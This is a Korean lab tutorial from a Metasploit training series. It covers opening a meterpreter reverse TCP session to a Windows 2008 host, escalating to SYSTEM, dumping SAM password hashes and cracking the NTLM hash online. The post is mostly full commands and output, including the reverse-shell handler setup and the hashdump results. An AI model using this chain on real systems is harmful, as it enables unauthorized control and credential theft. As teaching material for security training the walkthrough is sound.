정보보안(구버전)/Metasploit 2016. 6. 7. 12:24

Metasploit - 12. 취약점 발견 및 공격 (Password Hash Dump)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

[실습 시스템] Kali Linux, Firewall, Window2008

 

 

 - Reverse TCP를 이용하여 Window2008 제어권을 획득한 이후, Window2008 패스워드 해킹을 테스트한다.

 

 

[실습 단계]

 

스캔 -> 공격 타겟 선정 -> 백도어 구성 -> 공격 코드 파일 생성 -> 공격 타겟에 공격 코드 파일 유입 실시

 

-> 백도어 실행 -> 공격 코드 파일 실행 -> 제어권 획득 -> 패스워드 Hash Dump 실시 -> 크랙 사이트 이용

 

 

 

Ex1) Window2008 로그인 패스워드 변경

 

 - 실습을 하기 위해서 로그인 패스워드를 간단하게 변경하도록 한다. (패스워드 : 0000)

 

@ Window2008

 

 ① 시작 -> 관리도구 -> 로컬 보안 정책

 

 ② 보안 설정 -> 계정 정책 -> 암호 정책

 

 ③ "암호는 복잡성을 만족해야 함" -> 마우스 우클릭 -> 속성(R) -> "사용 안 함(S)' 체크 -> 확인

 

 ④ 시작 -> 관리도구 -> 컴퓨터 관리 -> 로컬 사용자 및 그룹 -> 사용자

 

 ⑤ 'Administrator' 선택 -> 마우스 우클릭 -> 암호 설정 -> 계속 -> 패스워드 '0000' 설정 -> 확인

 

 

 

 

Ex2) 백도어 'reverse_resource.rc' 실행

 

@ Kali Linux

 

root@kali:~# cd /root/bin

root@kali:~/bin# msfconsole -r reverse_resource.rc
                                                 
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

 

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

 

[*] Processing reverse_resource.rc for ERB directives.
resource (reverse_resource.rc)> use exploit/multi/handler
resource (reverse_resource.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (reverse_resource.rc)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (reverse_resource.rc)> set ExitSession false
ExitSession => false
resource (reverse_resource.rc)> exploit -j -z
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.20.50:4444


[*] Starting the payload handler...
msf exploit(handler) >

 

 

 

 

Ex3) Window2008 'reverse.exe' 공격 코드(악성 코드) 실행

 

@ Window2008

 

 

 

 

 

Ex4) 백도어 'reverse_resource.rc' 상태 확인

 

 - Window2008이 Kali Linux에 연결되었는지 확인한다.

 

@ Kali Linux

 

msf exploit(handler) >

[*] Sending stage (1188911 bytes) to 192.168.20.201
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.201:1033) at 2016-06-07 11:20:43 +0900

 

msf exploit(handler) > sessions -i

Active sessions
===============

  Id  Type                   Information                      Connection
  --  ----                   -----------                      ----------
  1   meterpreter x64/win64  WIN2008\Administrator @ WIN2008  192.168.20.50:4444 -> 192.168.20.201:1033 (192.168.20.201)

 

 

 - Window2008 제어권 획득 실시

 

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

 

meterpreter > sysinfo
Computer        : WIN2008
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/win64

 

 

meterpreter > getuid
Server username: WIN2008\Administrator

 


meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

 


meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

 


meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY f43109aa8336014a3cc6fc4322a81e05...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

 

No users with password hints on this system

 

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:ea7c23f2efca850e3fb547ca12567c33:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

 


meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.20.201 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) >
msf exploit(handler) > exit
root@kali:~/bin#

 

 

 

 

Ex5) 패스워드 크랙 사이트를 이용하여 패스워드 크랙 실시

 

 - 패스워드 크랙 사이트 : http://hashkiller.co.uk

 

@Password Hash Dump 값.txt

 

@ 로컬 PC

 

Decrypter/Cracket -> NTLM Decrypter

 

 

 

 

Window2008 'Administrator' Hash Dump 입력 -> Submit 클릭

 

 

 

 

Administrator 로그인 패스워드 '0000' 확인

 

 

 

 - Window2008 원래 패스워드로 변경 실시

 

 

 

 

[참고] 윈도우 SAM 파일에 있는 패스워드 Hash 크랙 툴

 

 - 존더리퍼(John The Ripper), PWDump, Rainbow Crack

 - 'hashkiller.co.uk' 사이트는 복잡한 패스워드에 대해서 크랙 시간이 길거나 불가능하다.

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)


Metasploit - 제1장 메타스플로잇 (metaspliot)   

 

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q